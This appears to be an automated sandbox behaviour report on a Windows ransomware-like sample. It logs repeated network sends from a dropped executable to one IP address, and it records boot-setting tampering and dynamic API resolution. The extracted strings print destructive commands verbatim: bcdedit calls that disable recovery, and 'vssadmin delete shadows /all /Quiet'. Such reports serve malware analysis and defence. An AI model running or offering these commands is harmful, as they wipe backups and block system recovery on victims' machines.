Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

File created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

May use bcdedit to modify the Windows boot settings

Show sources

Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: bcdedit.exe /set {current} optionsedit off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: bcdedit.exe /set {current} bootems off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: amhfnhe45.exe	Binary or memory string: bcdedit.exe /set {current} optionsedit off
Source: amhfnhe45.exe	Binary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: amhfnhe45.exe	Binary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: amhfnhe45.exe	Binary or memory string: bcdedit.exe /set {current} bootems off
Source: amhfnhe45.exe	Binary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: amhfnhe45.exe	Binary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: amhfnhe45.exe	Binary or memory string: \#bcdedit.exe
Source: bcdedit.exe	Binary or memory string: bcdedit.exe /set {current} bootems off
Source: bcdedit.exe	Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} bootems offC:\Windows\system32\bcdedit.exeWinsta0\Default3
Source: bcdedit.exe	Binary or memory string: bcdedit.exe /set {current} bootems off4
Source: bcdedit.exe	Binary or memory string: ^,\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##0
Source: bcdedit.exe	Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe	Binary or memory string: bcdedit.exe
Source: bcdedit.exe	Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe	Binary or memory string: bcdedit.exe/set{current}bootemsoffnLOCALAPPDATA=C:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCEh
Source: bcdedit.exe	Binary or memory string: =bcdedit.exe/set{current}advancedoptionsoff:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\PrZlx)
Source: bcdedit.exe	Binary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: bcdedit.exe	Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} advancedoptions offC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exe	Binary or memory string: bcdedit.exe /set {current} advancedoptions offx
Source: bcdedit.exe	Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe	Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe	Binary or memory string: bcdedit.exe
Source: bcdedit.exe	Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe	Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe	Binary or memory string: bcdedit.exe
Source: bcdedit.exe	Binary or memory string: bcdedit.exe/set{current}optionseditoffPPDATA=C:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windo*
Source: bcdedit.exe	Binary or memory string: bcdedit.exe /set {current} optionsedit off
Source: bcdedit.exe	Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} optionsedit offC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exe	Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe	Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe	Binary or memory string: bcdedit.exe/set{current}bootstatuspolicyIgnoreAllFailuresGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Wi
Source: bcdedit.exe	Binary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: bcdedit.exe	Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exe	Binary or memory string: ^C\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe	Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe	Binary or memory string: bcdedit.exe
Source: bcdedit.exe	Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe	Binary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: bcdedit.exe	Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} recoveryenabled offC:\Windows\system32\bcdedit.exeWinsta0\DefaulteBP
Source: bcdedit.exe	Binary or memory string: bcdedit.exe /set {current} recoveryenabled offbBP
Source: bcdedit.exe	Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe	Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe	Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe	Binary or memory string: bcdedit.exe
Source: bcdedit.exe	Binary or memory string: bcdedit.exe/set{current}recoveryenabledoff:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\Pr

Uses bcdedit to modify the Windows boot settings

Show sources

Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_0042D4E5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_0042D4E5

